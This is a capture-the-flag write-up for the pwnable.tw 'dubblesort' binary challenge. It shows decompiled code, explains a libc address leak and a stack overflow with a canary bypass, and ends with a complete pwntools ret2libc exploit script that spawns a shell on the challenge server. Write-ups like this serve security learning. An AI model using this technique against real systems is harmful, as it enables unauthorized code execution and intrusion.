[pwnable.tw] dubblesort writeup
strange character appeared, should check for the leak
it seems to do real sorting of the numbers I entered.
int __cdecl main(int argc, const char **argv, const char **envp) { int num_cnt; // eax unsigned int *ptr_arr; // edi unsigned int cnt; // esi unsigned int index; // esi int result; // eax int v8; // [esp+8h] [ebp-84h] unsigned int input_cnt; // [esp+18h] [ebp-74h] unsigned int arr[8]; // [esp+1Ch] [ebp-70h] char buf[64]; // [esp+3Ch] [ebp-50h] unsigned int v12; // [esp+7Ch] [ebp-10h] v12 = __readgsdword(0x14u); sub_8B5(); __printf_chk(1, "What your name :", v8); read(0, buf, 0x40u); __printf_chk(1, "Hello %s,How many numbers do you what to sort :", buf); __isoc99_scanf("%u", &input_cnt); num_cnt = input_cnt; if ( input_cnt ) { ptr_arr = arr; cnt = 0; do { __printf_chk(1, "Enter the %d number : ", cnt); fflush(stdout); __isoc99_scanf("%u", ptr_arr); ++cnt; num_cnt = input_cnt; ++ptr_arr; } while ( input_cnt > cnt ); } SUB_processing(arr, num_cnt); puts("Result :"); if ( input_cnt ) { index = 0; do __printf_chk(1, "%u ", arr[index++]); while ( input_cnt > index ); } result = 0; if ( __readgsdword(0x14u) != v12 ) SUB_exit(); return result; }
i can leak the value in stack thanks to printf("%s") !! (at the line no. 18)
But I can't leak the canary because buf's length is 0x40.
What I can leak is libc address. (checked using gdb)
Then, it reads some value and store it in the stack.
The point is, that there is no limit at the number of entering number.
we can overwrite the return address!
But.. what about the canary?
Um.... after such time of worrying I found out that if I entered non-numeric value when scanf("%u"), nothing is written at the stack!
okay, then we can leave the canary as it's very first value.
Processing function performs bubble sort of entered values.
What I have to do is just writing the address of 'system function' and the string '/bin/sh' at appropriate position in the stack and important thing is to make sure that they are not mixed because of sorting process!
#!/usr/bin/env python # pwnable.tw dubblesort from pwn import * debug = 0 def leak(offset): s.recvuntil('name :') s.send('a' * offset * 4) s.recvuntil('Hello '+'a' * offset*4) re = u32(s.recv(4)) if debug: log.info('raw leak : '+hex(re)) return re def send_num(num): s.recvuntil('number : ') s.sendline(num) def exploit(): libc_base = leak(7) - 0x1ae244 if debug: log.info('libc base : '+hex(libc_base)) if debug: binsh_offset = 0x15ba0b system_offset = 0x3ada0 else: binsh_offset = 0x158e8b system_offset = 0x3a940 system = libc_base + system_offset binsh = libc_base + binsh_offset s.recvuntil('sort :') s.sendline('35') for i in range(24): send_num('1') send_num('+') # canary for i in range(8): send_num(str(system)) send_num(str(binsh)) send_num(str(binsh)) if __name__ == '__main__': if debug: #export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:~/pwnable_tw/dubblesort/libc s = process('./dubblesort') pause() else: s = remote('chall.pwnable.tw', 10101) exploit() s.interactive() s.close()